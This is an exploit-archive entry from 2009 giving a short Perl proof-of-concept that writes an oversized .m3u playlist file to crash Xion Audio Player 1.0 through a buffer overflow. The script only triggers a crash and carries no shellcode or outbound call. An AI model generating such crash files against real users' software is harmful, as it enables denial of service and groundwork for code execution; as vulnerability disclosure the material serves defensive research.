[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Xion Audio Player 1.0 121 m3u file buffer overflow
# Published : 2009-10-16
# Author : Dragon Rider
# Previous Title : Xpdf 3.01 heap overflow and null pointer dereference
# Next Title : Millenium MP3 Studio 2.0 m3u file BoF


#!/usr/bin/perl
#=====================================
#Xion Audio Player(.m3u File) Local buffer Overflow PoC
#download:http://www.brothersoft.com/xion-audio-player-download-49404.html
#=====================================
#Author:Dragon Rider
#contact:drag0n.rider(at)hotmail.com
#=====================================
#tested on WinXp SP3

my $crash = "x41" x 5000;
open(myfile,'>>DragonR.m3u'); 
print myfile $crash;